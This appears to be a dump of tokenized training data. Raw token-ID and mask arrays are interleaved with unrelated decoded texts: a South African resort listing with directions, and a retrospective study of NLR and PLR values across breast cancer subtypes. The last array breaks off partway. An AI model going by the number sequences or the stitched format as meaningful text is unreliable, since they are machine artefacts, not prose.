3289, 3235, 29892, 13, 334, 399, 1806, 8187, 2692, 399, 1718, 29934, 13566, 29059, 6323, 8707, 29928, 22122, 29903, 8079, 13764, 29979, 476, 22255, 29892, 2845, 4653, 470, 2411, 2957, 29889, 13, 334, 2823, 278, 19245, 363, 278, 2702, 4086, 14765, 1076, 11239, 322, 13, 334, 27028, 1090, 278, 19245, 29889, 13, 3776, 13, 13, 29937, 5215, 376, 21576, 4897, 324, 17125, 29889, 29882, 29908, 13, 13, 29992, 21382, 402, 29924, 4897, 324, 17125, 13, 13, 29992, 19274, 26041, 675, 1134, 353, 903, 1853, 29936, 13, 13, 29899, 313, 2611, 4564, 300, 668, 29897, 2344, 3047, 2605, 29879, 5919, 3059, 2588, 29966, 29954, 4345, 2605, 334, 29958, 4748, 24772, 426, 13, 29871, 565, 313, 1311, 353, 518, 9136, 2069, 2314, 426, 13, 1678, 903, 1853, 353, 12490, 7713, 17125, 1769, 13, 1678, 903, 24772, 353, 518, 24772, 3509, 1385, 13, 29871, 500, 13, 29871, 736, 1583, 29936, 13, 29913, 13, 13, 29992, 355, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
On-site On-site Off-site Car Rental (16.0 mi) Medical facility (16.0 mi) Transportation and Parking Parking: On-site Off-site Parks/Zoos (40.0 mi) Parks/Zoos Type : Nature Reserve The Malelane and Numbi gates of the Kruger Park are a mere 1 hour drive away, while the Sudwala pre-historic park is within walking distance. There are various outdoor activities which include hiking trails, horse riding and a wealth of species for bird lovers. Bedding Configuration Destination Highlights The Malelane and Numbi gates of the Kruger Park are a mere 1 hour drive away, while the Sudwala pre-historic park is within walking distance. There are various outdoor activities which include hiking trails, horse riding and a wealth of species for bird lovers. Directions from Major Airport to Resort From Johannesburg International Airport, travel on the R21 Witbank highway, it is the 1st turnoff at the exit of the Airport. Continue on this highway towards Witbank N12 This highway joins into the N4 Towards Witbank/Middelburg. Continue traveling towards Nelspruit. 26km before Nelspruit, turn right towards Sudwala Caves (R539). The resort is 10km down the road.
[ 1, 1551, 29899, 2746, 13, 13, 2951, 29899, 2746, 13, 13, 6880, 29899, 2746, 13, 13, 8179, 390, 13703, 313, 29896, 29953, 29889, 29900, 3737, 29897, 13, 13, 19302, 936, 24454, 313, 29896, 29953, 29889, 29900, 3737, 29897, 13, 13, 27395, 362, 322, 4815, 292, 13, 13, 29925, 935, 292, 29901, 1551, 29899, 2746, 13, 13, 6880, 29899, 2746, 13, 13, 29925, 17862, 29914, 29999, 29877, 359, 313, 29946, 29900, 29889, 29900, 3737, 29897, 13, 13, 29925, 17862, 29914, 29999, 29877, 359, 5167, 584, 17677, 27811, 13, 13, 1576, 27208, 25821, 322, 405, 3774, 29875, 29341, 310, 278, 28499, 914, 4815, 526, 263, 15187, 29871, 29896, 7234, 7899, 3448, 29892, 1550, 278, 8383, 29893, 2883, 758, 29899, 16211, 293, 14089, 338, 2629, 22049, 5418, 29889, 1670, 526, 5164, 714, 17433, 14188, 607, 3160, 298, 638, 292, 1020, 2719, 29892, 10435, 364, 4821, 322, 263, 17173, 310, 6606, 363, 11199, 658, 874, 29889, 13, 13, 29933, 287, 8497, 20999, 13, 13, 14994, 3381, 5057, 4366, 29879, 13, 13, 1576, 27208, 25821, 322, 405, 3774, 29875, 29341, 310, 278, 28499, 914, 4815, 526, 263, 15187, 29871, 29896, 7234, 7899, 3448, 29892, 1550, 278, 8383, 29893, 2883, 758, 29899, 16211, 293, 14089, 338, 2629, 22049, 5418, 29889, 1670, 526, 5164, 714, 17433, 14188, 607, 3160, 298, 638, 292, 1020, 2719, 29892, 10435, 364, 4821, 322, 263, 17173, 310, 6606, 363, 11199, 658, 874, 29889, 13, 13, 29928, 533, 1953, 515, 11019, 18117, 304, 2538, 441, 13, 13, 4591, 15265, 3074, 4623, 18117, 29892, 9850, 373, 278, 390, 29906, 29896, 24363, 9157, 29469, 29892, 372, 338, 278, 29871, 29896, 303, 2507, 2696, 472, 278, 6876, 310, 278, 18117, 29889, 2866, 14150, 373, 445, 29469, 7113, 24363, 9157, 405, 29896, 29906, 910, 29469, 26205, 964, 278, 405, 29946, 22578, 3163, 24363, 9157, 29914, 29924, 2205, 295, 3074, 29889, 2866, 14150, 9850, 292, 7113, 405, 1379, 558, 3121, 29889, 29871, 29906, 29953, 8848, 1434, 405, 1379, 558, 3121, 29892, 2507, 1492, 7113, 8383, 29893, 2883, 315, 5989, 313, 29934, 29945, 29941, 29929, 467, 450, 25362, 338, 29871, 29896, 29900, 8848, 1623, 278, 6520, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Introduction {#sec1-1} ============ Breast cancer is a heterogeneous complex of diseases consisting of many subtypes with distinct biological features. Breast cancer subtypes have different response patterns to various treatment modalities and clinical outcomes. Traditional classification systems regarding biological characteristics may have limitations for patient-tailored treatment strategies. Breast cancers have been classified into different intrinsic subtypes with distinct clinical outcomes according to gene expression patterns, and each intrinsic subtype is represented by an immunohistochemical-defined subtype (Yersal et al., 2014). Tumor characteristics and host response, including the inflammatory response, both contribute to the clinical outcomes of cancer patients. Histopathological analysis of tumors has shown tumor infiltration by inflammatory and lymphocytic cells. Immune infiltrates are heterogeneous between tumor types and differ from patient to patient. The interaction of the immune system with tumor cells in breast cancer appears to be associated with prognosis (Faria et al., 2016). The neutrophil / lymphocyte ratio (NLR) and platelet / lymphocyte ratio (PLR) are easily measured, reproducible, and inexpensive markers of subclinical inflammation and have a prognostic role in various cancer types, including breast cancer. Human epidermal growth factor receptor-2 (HER2) positivity has been shown to be associated with higher NLR, whereas estrogen receptor (ER)- and progesterone receptor (PR)-positivity have been associated with lower NLR values (Dirican et al., 2015). HER2-positive and triple-negative breast cancer (TNBC) are thought to be more immunogenic than luminal carcinomas (Luen and Loi, 2016). The aim of this study was to investigate the NLR and PLR values in different molecular subtypes of breast cancer. Materials and Methods {#sec1-2} ===================== In this study, we retrospectively evaluated a total of 255 female breast cancer patients who underwent surgery at the Adana Numune Training and Research Hospital and Samsun Training and Research Hospital from January 2010 to December 2014. The study began following approval by the Academic Committee. Preoperative complete blood counts (leukocytes, neutrophils, lymphocytes) of the patients with histologically verified breast cancer were analyzed. Patients with active infection, active bleeding, blood transfusion within the last 3 months, chronic inflammatory or autoimmune disease, or steroid treatment were excluded from the study. Medical records were collected from medical files. Medical history, age, and subtype of breast cancer, the number of axillary lymph node metastases, tumor diameter, TNM stage, status and positivity of ER and PR, HER2, complete blood cell counts, and NLR and PLR were obtained for each patient. ER and PR status were attained from immunohistochemistry, and a value ≥1% was considered as positive. HER2 status was obtained by immunohistochemistry or fluorescent in situ hybridization (FISH). IHC 3+ and IHC 2+ that were FISH positive were classified as HER2-positive tumors; IHC 2+ that were either FISH negative, IHC 1+, or IHC positive were classified as HER2-negative tumors. Intrinsic breast cancer subtypes were classified according to the following criteria: luminal subtype, ER positive, and/or PR positive and HER2 negative, HER2-enriched subtype, ER, and PR negative with positive HER2, triple-negative tumors, ER negative, PR negative, and HER2 negative. Complete blood count test results were attained within 1 week before the surgery. The NLR was defined as the absolute neutrophil count divided by the absolute lymphocyte count. PLR was defined as the absolute platelet count divided by the absolute lymphocyte count. The patients were divided into two groups according to the mean value of NLR (low NLR: ≤2.5, high: NLR: \>2.5). Statistical analysis {#sec2-1} -------------------- The data analysis was performed by using SPSS for Windows, version 22 (SPSS, Chicago, IL, USA). The normality of the distributions of continuous variables was determined via the Shapiro--Wilk test. The data were reported as the mean ± standard deviation or median and range where applicable. The differences in the results between the groups were compared by performing Student's t-test or the Mann--Whitney U test, where appropriate. When more than two independent groups were considered, the Kruskal--Wallis test was applied for comparisons of the median values. The categorical data were analyzed by using Pearson's chi-square or Fisher's exact test, where appropriate. Degrees of association between continuous variables were evaluated via Spearman's correlation analysis. The coefficient of regression and the 95% confidence interval for each independent variable were also calculated. A *P value* \< 0.05 was considered as indicating statistical significance. Results {#sec1-3} ======= Between January 2010 and December 2014, 255 breast cancer patients were enrolled in the study. All patients were female, and the median age was 53. The baseline characteristics of the study subjects are summarized in [Table 1](#T1){ref-type="table"}. The most common histological type was invasive ductal carcinoma. Stage II was the most common stage. The median values of NLR and PLR were 2.01 (range, 0.37--37.1) and 137.8 (range, 37.1--421.3), respectively. Of the total 255 patients, 183 had NLR \< 2.5 and 72 patients had NLR ≥ 2.5. ###### Patients Characteristics Characteristics Median Min-max ----------------------- -------- -------------- Age (years) 53 24-- 76 Tumor diameter 3 0.1-- 11 Metastatic lymph node 1 0-- 37 Total lymph node 16 1-- 37 NLR 2.01 0.37-- 37.1 PLR 137.8 37.1-- 421.3 Breast cancer histopathological features and subtypes are shown in [Table 2](#T2){ref-type="table"}. The most defined molecular subtype was luminal type. The HER2-positive group accounted for 19.2% of all patients, and the triple-negative group accounted for 14.1%. ###### Breast Cancer Histopathological Features and Subtypes Features N (%) ------------------ ----------------- ------------ Invasive ductal 202 (79.2) Invasive lobular 18 (7.1) Others 35 (13.7) Stage (n = 255) 1A 29 (11.4) 1B 4 (1.6) 2A 60 (23.5) 2B 52 (20.4) 3A 50 (19.6) 3B 25 (9.8) 3C 28 (11) 4 7 (2.7) ER Positive 195 (76.5) Negative 60 (23.5) PR Positive 170 (66.7) Negative 85 (33.3) Cerb-B2 Positive 49 (20.4) Negative 206 (79.6) Subtype Luminal 170 (66.7) HER2 positive 49 (19.2) Triple negative 36 (14.1) PLR was positively correlated with tumor size and age. There were no significant correlations among NLR or PLR and metastatic lymph node count, total lymph node count, or Ki-67 status ([Table 3](#T3){ref-type="table"}). ###### Tumor Characteristics and NLR/PLR Correlation Variables NLR PLR ----------------------- ---------------------- ---------------------- Age (years) r = −0.021 P = 0.734 r = −0.166 P = 0.008 Tumor diameter r = −0.091 P = 0.149 r = 0.138 P = 0.028 Metastatic lymph node r = 0.068 P = 0.276 r = 0.075 P = 0.233 Total lymph node r = −0.060 P = 0.338 r = −0.061 P = 0.334 Ki-67 r = −0.015 P = 0.875 r = 0.005 P = 0.961 The associations among NLR and clinicopathological variables are shown in [Table 4](#T4){ref-type="table"}. NLR had no statistically significant associations with age, HER2 expression status, or hormone receptor positivity. There was no differences in tumor size; ER, PR, and cerbB2 status; histological grade; and lymphovascular and perineural invasion between the low- and high-NLR groups. ###### Tumor and Patient Characteristics by NLR Characteristics NLR *P* ------------------------ ----- ------------- ------------- ------- Age (years) 255 55 (27--75) 53 (26--75) 0.69 Tumor size 255 3 (0.1--11) 3 (0.2--11) 0.232 Metastatic lymph node 255 1 (0--37) 2 (0--23) 0.406 Total lymph node 255 17 (1--37) 14 (3--34) 0.123 Histological grade 212 150 62  Grade 1 22 18 (12.0) 4 (6.5) 0.412  Grade 2 99 67 (44.7) 32 (51.6)  Grade 3 91 65 (43.3) 26 (41.9) Lenfovascular invasion 186 130 56  No 46 29 (22.3) 17 (30.4) 0.326  Yes 140 101 (77.7) 39 (69.6) Perineural invasion 139 99 40  No 75 56 (56.6) 19 (47.5) 0.434  Yes 64 43 (43.4) 21 (52.5) ER 255  Negative 60 47 (25.7) 13 (18.1) 0.259  Positive 195 136 (74.3) 59 (81.9) PR 255  Negative 85 65 (35.5) 20 (27.8) 0.302  Positive 170 118 (64.5) 52 (72.2) Cerb B2 252 181 71  Negative 203 141 (77.9) 62 (87.3) 0.128  Positive 49 40 (22.1) 9 (12.7) There were no significant differences in the NLR and PLR values among the luminal type, HER2-positive, or triple-negative tumors ([Table 5](#T5){ref-type="table"}). ###### Breast Cancer Subtypes According to Low- and High-NLR Values Subtype NLR *P* ----------------- ------------ ----------- ------- Luminal 113 (66.9) 56 (33.1) 0.051 HER2 positive 41 (82) 9 (18) Triple negative 29 (80.6) 7 (19.4) Discussion {#sec1-4} ========== In this study, we examined the relationships among breast cancer subtypes and the NLR and PLR as indicators of inflammation. Several studies have shown that, compared with the luminal A subtype, the triple-negative and HER2-enriched breast cancer subtypes are more immunogenic and associated with poorer prognosis (Liu, 2014). A neutrophilic host response to tumor has also been associated with poor prognosis because it can inhibit the immune system by suppressing the cytotoxic activity of T cells. We hypothesized that the degree of inflammatory response, as indicated by NLR, may be different among breast cancer subtypes. We could not find any differences in NLR and PLR values among breast cancer subtypes, including triple-negative and HER2-positive subtypes. Several studies have demonstrated relationships between the inflammatory system and cancer. Pretreatment neutrophil, lymphocyte, and platelet counts are indicators of cancer-associated inflammation. High neutrophil count has been demonstrated to be an independent prognostic marker for cancer recurrence and survival, including gastric cancer, metastatic renal cell carcinoma, metastatic melanoma, and advanced non-small cell lung cancer (Jia et al., 2015; Li et al., 2015; Stotz et al., 2013; Ishizuka et al., 2013; Peng et al., 2015; Kim et al., 2015). The interaction between neutrophil and lymphocyte inflammatory responses has a critical role in carcinogenesis. The mechanism underlying the relationship between a high NLR and poor outcome in breast cancer is not completely understood. A multifactorial process has been hypothesized to explain the relationship between high NLR and poor prognosis. Neutrophils may act as tumor-promoting leukocytes and be capable of inhibiting the immune system via suppression of the cytolytic activity of lymphocytes, natural killer cells, and activated T-cells. Neutrophils promote leakage of tumor cells and endothelial cells into the circulation, thereby contributing to redirection of the inflammatory response in a tumor-promoting direction (Galdiero et al., 2013). Neutrophils can also secrete circulating vascular endothelial growth factor that promotes tumor development (Balkwill et al., 2012); therefore, an elevated neutrophil count can stimulate tumor angiogenesis and contribute to disease progression, thus leading to a negative correlation between neutrophil density and patient survival. Neutrophilia can also be due to paraneoplastic production of myeloid growth factors produced by cancer (Teramukai et al., 2009). These factors inhibit apoptosis of tumor cells via nuclear factor kB activation. These events enhance angiogenesis, tumor growth, and progression to a metastatic phenotype (Quail and Joyce, 2013). Thus, the NLR can reflect the balance between activation of the inflammatory pathway and the anti-tumor immune function in breast cancer. Absolute neutrophil and lymphocyte numbers may be influenced by various physiological, pathological, and physical factors. However, NLR has been shown to remain more stable than other leukocyte parameters. NLR and PLR are easily available simple markers based on white blood cell count and platelet numbers that indicate subclinical inflammation. Noh et al., (2013) found that elevated NLR at initial clinical presentation of breast cancer was an independent factor for poor survival rate in breast cancer patients. In addition, Yao et al. showed that elevated NLR (≥2.5) and RDW were significantly associated with poor prognosis (Yao et al., 2014). In this study, we performed a cohort of breast cancer patients to evaluate the NLR and PLR values in different molecular subtypes of breast cancer. Several studies have reported different outcomes according to NLR values between breast cancer subtypes. Koh et al., (2014) evaluated 157 hormone receptor-positive HER2-negative breast cancer patients treated with neoadjuvant chemotherapy, with a mean follow-up of 21 months after surgery. They showed that a NLR \> 2.25 was associated with shorter recurrence-free and overall survival (OS) and was an independent risk factor for recurrence and mortality. TNBCs show genetic instability leading to an increase in the number of mutations. Recent studies have shown that systemic inflammatory parameters could be helpful for predicting outcomes of TNBC patients. Pistelli et al., (2015) analyzed 90 patients with early TNBC to evaluate the correlations of NLR before treatment with disease-free survival (DFS) and OS. They showed that patients with a NLR \> 3 had shorter DFS and OS than those of patients with a NLR ≤ 3. Jia et al., (2015) reported that a high NLR before treatment was independently associated with a worse prognosis for TNBC. TNBCs have genomic instability, so they have a tendency to generate neoantigens and result in a heterogeneous pattern of immune infiltration. The clinicopathological features associated with high NLR values were increased T stage, younger age, and positive HER2 status. Azab et al., (2013) evaluated the prognostic ability of the NLR in 400 BC patients and showed that patients with a higher NLR were older and had more lymph node involvement and metastases Dirican et al., (2015) showed that tumor depth (pT), nodal status, American Joint Committee on Cancer staging (increasing pathological stage), and distant metastasis status were found to be significantly associated with high NLR. We found that higher PLR values were associated with age and tumor diameter, but we did not find any correlations among NLR and clinicopathological features. Ulas et al., (2015) did not identify any significant correlations among clinical and pathological parameters and the NLR in patients with BC. Our study had some limitations that should be noted. A portion of the data was missing because of the retrospective nature of the study. The Ki 67 value was not evaluable in all patients, so those with luminal subtypes were not divided into Luminal A and Luminal B subgroups. In conclusion, pretreatment NLR and PLR values were not associated with tumor subtype in breast cancer patients. Prospective studies with larger patient numbers and prognostic data will make it possible to obtain more reliable results. Conflicts of Interest {#sec2-2} --------------------- None of the authors has a conflict of interest related to this study. This study was not supported by any institution or company.
[ 1, 27576, 426, 29937, 3471, 29896, 29899, 29896, 29913, 13, 4936, 2751, 13, 13, 20130, 579, 23900, 338, 263, 25745, 23724, 4280, 310, 10267, 2129, 19849, 310, 1784, 1014, 8768, 411, 8359, 4768, 5996, 5680, 29889, 5826, 579, 23900, 1014, 8768, 505, 1422, 2933, 15038, 304, 5164, 14502, 13008, 1907, 322, 24899, 936, 714, 26807, 29889, 18375, 3245, 12965, 6757, 11211, 4768, 5996, 21862, 1122, 505, 27028, 363, 16500, 29899, 18237, 4395, 14502, 16650, 583, 29889, 5826, 579, 508, 22543, 505, 1063, 770, 2164, 964, 1422, 11158, 28594, 1014, 8768, 411, 8359, 24899, 936, 714, 26807, 5034, 304, 18530, 4603, 15038, 29892, 322, 1269, 11158, 28594, 1014, 1853, 338, 9875, 491, 385, 5198, 348, 1148, 391, 2878, 331, 936, 29899, 12119, 1014, 1853, 313, 29979, 414, 284, 634, 394, 1696, 29871, 29906, 29900, 29896, 29946, 467, 13, 13, 29911, 398, 272, 21862, 322, 3495, 2933, 29892, 3704, 278, 4414, 314, 2922, 706, 2933, 29892, 1716, 29126, 304, 278, 24899, 936, 714, 26807, 310, 23900, 22069, 29889, 15179, 459, 493, 5996, 7418, 310, 21622, 943, 756, 4318, 21622, 272, 297, 1777, 509, 362, 491, 4414, 314, 2922, 706, 322, 301, 962, 561, 542, 3637, 293, 9101, 29889, 1954, 29885, 1540, 297, 1777, 509, 1078, 526, 25745, 23724, 1546, 21622, 272, 4072, 322, 1163, 515, 16500, 304, 16500, 29889, 450, 14881, 310, 278, 5198, 1540, 1788, 411, 21622, 272, 9101, 297, 24207, 23900, 5692, 304, 367, 6942, 411, 410, 5138, 19263, 313, 29943, 4568, 634, 394, 1696, 29871, 29906, 29900, 29896, 29953, 467, 450, 11553, 19783, 309, 847, 301, 962, 561, 22502, 371, 11959, 313, 25103, 29934, 29897, 322, 15284, 1026, 847, 301, 962, 561, 22502, 371, 11959, 313, 7390, 29934, 29897, 526, 5948, 17005, 29892, 9483, 15520, 29892, 322, 297, 4548, 6270, 29320, 310, 1014, 695, 262, 936, 4414, 4850, 362, 322, 505, 263, 410, 5138, 520, 293, 6297, 297, 5164, 23900, 4072, 29892, 3704, 24207, 23900, 29889, 13, 13, 29950, 7889, 321, 5935, 837, 284, 14321, 7329, 337, 14268, 29899, 29906, 313, 4448, 29906, 29897, 13686, 2068, 756, 1063, 4318, 304, 367, 6942, 411, 6133, 405, 29519, 29892, 13452, 707, 307, 1885, 337, 14268, 313, 1001, 6817, 322, 410, 29887, 4156, 650, 337, 14268, 313, 10593, 6817, 1066, 24858, 505, 1063, 6942, 411, 5224, 405, 29519, 1819, 313, 9170, 2185, 634, 394, 1696, 29871, 29906, 29900, 29896, 29945, 467, 379, 1001, 29906, 29899, 1066, 3321, 322, 21954, 29899, 22198, 24207, 23900, 313, 29911, 29940, 5371, 29897, 526, 2714, 304, 367, 901, 5198, 348, 6352, 293, 1135, 19703, 979, 1559, 16381, 18902, 313, 29931, 3837, 322, 4309, 29875, 29892, 29871, 29906, 29900, 29896, 29953, 467, 450, 12242, 310, 445, 6559, 471, 304, 23033, 278, 405, 29519, 322, 16507, 29934, 1819, 297, 1422, 13206, 16637, 1014, 8768, 310, 24207, 23900, 29889, 13, 13, 24095, 29879, 322, 8108, 29879, 426, 29937, 3471, 29896, 29899, 29906, 29913, 13, 9166, 2751, 29922, 13, 13, 797, 445, 6559, 29892, 591, 3240, 1883, 1103, 3598, 19030, 263, 3001, 310, 29871, 29906, 29945, 29945, 12944, 24207, 23900, 22069, 1058, 1090, 29893, 296, 25300, 708, 472, 278, 2087, 1648, 11848, 1540, 26101, 322, 10550, 15967, 322, 317, 2232, 348, 26101, 322, 10550, 15967, 515, 5490, 29871, 29906, 29900, 29896, 29900, 304, 5846, 29871, 29906, 29900, 29896, 29946, 29889, 450, 6559, 4689, 1494, 2134, 791, 491, 278, 16146, 293, 12930, 29889, 4721, 3372, 1230, 4866, 10416, 18139, 313, 280, 2679, 22502, 2167, 29892, 11553, 19783, 2719, 29892, 301, 962, 561, 22502, 2167, 29897, 310, 278, 22069, 411, 9825, 1189, 1711, 26834, 24207, 23900, 892, 29537, 287, 29889, 4121, 10070, 411, 6136, 297, 20309, 29892, 6136, 10767, 21219, 29892, 10416, 1301, 29888, 3958, 2629, 278, 1833, 29871, 29941, 7378, 29892, 17168, 293, 4414, 314, 2922, 706, 470, 4469, 6727, 1540, 17135, 29892, 470, 16864, 3398, 14502, 892, 429, 13347, 515, 278, 6559, 29889, 13, 13, 19302, 936, 6475, 892, 16531, 515, 16083, 2066, 29889, 20795, 4955, 29892, 5046, 29892, 322, 1014, 1853, 310, 24207, 23900, 29892, 278, 1353, 310, 4853, 453, 653, 301, 962, 561, 2943, 1539, 579, 2129, 29892, 21622, 272, 24235, 29892, 323, 29940, 29924, 7408, 29892, 4660, 322, 13686, 2068, 310, 8982, 322, 12089, 29892, 379, 1001, 29906, 29892, 4866, 10416, 3038, 18139, 29892, 322, 405, 29519, 322, 16507, 29934, 892, 7625, 363, 1269, 16500, 29889, 8982, 322, 12089, 4660, 892, 1098, 7114, 515, 5198, 348, 1148, 391, 2878, 331, 6020, 29892, 322, 263, 995, 29871, 30386, 29896, 29995, 471, 5545, 408, 6374, 29889, 379, 1001, 29906, 4660, 471, 7625, 491, 5198, 348, 1148, 391, 2878, 331, 6020, 470, 20501, 2361, 1760, 297, 2990, 7498, 19515, 2133, 313, 29943, 3235, 29950, 467, 306, 19127, 29871, 29941, 29974, 322, 306, 19127, 29871, 29906, 29974, 393, 892, 383, 3235, 29950, 6374, 892, 770, 2164, 408, 379, 1001, 29906, 29899, 1066, 3321, 21622, 943, 29936, 306, 19127, 29871, 29906, 29974, 393, 892, 2845, 383, 3235, 29950, 8178, 29892, 306, 19127, 29871, 29896, 29974, 29892, 470, 306, 19127, 6374, 892, 770, 2164, 408, 379, 1001, 29906, 29899, 22198, 21622, 943, 29889, 13, 13, 797, 509, 28594, 24207, 23900, 1014, 8768, 892, 770, 2164, 5034, 304, 278, 1494, 16614, 29901, 19703, 979, 1014, 1853, 29892, 8982, 6374, 29892, 322, 29914, 272, 12089, 6374, 322, 379, 1001, 29906, 8178, 29892, 379, 1001, 29906, 29899, 264, 4018, 287, 1014, 1853, 29892, 8982, 29892, 322, 12089, 8178, 411, 6374, 379, 1001, 29906, 29892, 21954, 29899, 22198, 21622, 943, 29892, 8982, 8178, 29892, 12089, 8178, 29892, 322, 379, 1001, 29906, 8178, 29889, 13, 13, 17813, 10416, 2302, 1243, 2582, 892, 1098, 7114, 2629, 29871, 29896, 4723, 1434, 278, 25300, 708, 29889, 450, 405, 29519, 471, 3342, 408, 278, 8380, 11553, 19783, 309, 2302, 13931, 491, 278, 8380, 301, 962, 561, 22502, 371, 2302, 29889, 16507, 29934, 471, 3342, 408, 278, 8380, 15284, 1026, 2302, 13931, 491, 278, 8380, 301, 962, 561, 22502, 371, 2302, 29889, 450, 22069, 892, 13931, 964, 1023, 6471, 5034, 304, 278, 2099, 995, 310, 405, 29519, 313, 677, 405, 29519, 29901, 29871, 30248, 29906, 29889, 29945, 29892, 1880, 29901, 405, 29519, 29901, 320, 29958, 29906, 29889, 29945, 467, 13, 13, 9513, 391, 936, 7418, 426, 29937, 3471, 29906, 29899, 29896, 29913, 13, 2683, 807, 13, 13, 1576, 848, 7418, 471, 8560, 491, 773, 10937, 1799, 363, 3852, 29892, 1873, 29871, 29906, 29906, 313, 5550, 1799, 29892, 10059, 29892, 17674, 29892, 8278, 467, 450, 4226, 537, 310, 278, 18822, 310, 9126, 3651, 471, 10087, 3025, 278, 1383, 2754, 307, 489, 29594, 29895, 1243, 29889, 450, 848, 892, 8967, 408, 278, 2099, 29871, 30221, 3918, 29522, 470, 19194, 322, 3464, 988, 22903, 29889, 450, 12651, 297, 278, 2582, 1546, 278, 6471, 892, 9401, 491, 15859, 15740, 29915, 29879, 260, 29899, 1688, 470, 278, 7908, 489, 8809, 277, 3801, 501, 1243, 29892, 988, 8210, 29889, 1932, 901, 1135, 1023, 7417, 6471, 892, 5545, 29892, 278, 7365, 375, 11311, 489, 29956, 497, 275, 1243, 471, 7436, 363, 5734, 14125, 310, 278, 19194, 1819, 29889, 450, 11608, 936, 848, 892, 29537, 287, 491, 773, 21265, 1100, 29915, 29879, 18558, 29899, 17619, 470, 12030, 261, 29915, 29879, 2684, 1243, 29892, 988, 8210, 29889, 360, 387, 11003, 310, 15477, 1546, 9126, 3651, 892, 19030, 3025, 5013, 279, 1171, 29915, 29879, 19869, 7418, 29889, 450, 10825, 310, 17855, 322, 278, 29871, 29929, 29945, 29995, 16420, 7292, 363, 1269, 7417, 2286, 892, 884, 12833, 29889, 319, 334, 29925, 995, 29930, 3551, 29871, 29900, 29889, 29900, 29945, 471, 5545, 408, 23941, 24148, 26002, 29889, 13, 13, 12191, 426, 29937, 3471, 29896, 29899, 29941, 29913, 13, 2751, 25512, 13, 13, 29933, 300, 1452, 5490, 29871, 29906, 29900, 29896, 29900, 322, 5846, 29871, 29906, 29900, 29896, 29946, 29892, 29871, 29906, 29945, 29945, 24207, 23900, 22069, 892, 427, 24476, 297, 278, 6559, 29889, 2178, 22069, 892, 12944, 29892, 322, 278, 19194, 5046, 471, 29871, 29945, 29941, 29889, 450, 2362, 5570, 21862, 310, 278, 6559, 17800, 526, 19138, 1891, 297, 518, 3562, 29871, 29896, 10514, 29911, 29896, 2597, 999, 29899, 1853, 543, 2371, 29908, 1836, 450, 1556, 3619, 9825, 5996, 1134, 471, 29688, 573, 868, 312, 284, 1559, 16381, 4125, 29889, 24906, 1944, 471, 278, 1556, 3619, 7408, 29889, 450, 19194, 1819, 310, 405, 29519, 322, 16507, 29934, 892, 29871, 29906, 29889, 29900, 29896, 313, 3881, 29892, 29871, 29900, 29889, 29941, 29955, 489, 29941, 29955, 29889, 29896, 29897, 322, 29871, 29896, 29941, 29955, 29889, 29947, 313, 3881, 29892, 29871, 29941, 29955, 29889, 29896, 489, 29946, 29906, 29896, 29889, 29941, 511, 8307, 29889, 4587, 278, 3001, 29871, 29906, 29945, 29945, 22069, 29892, 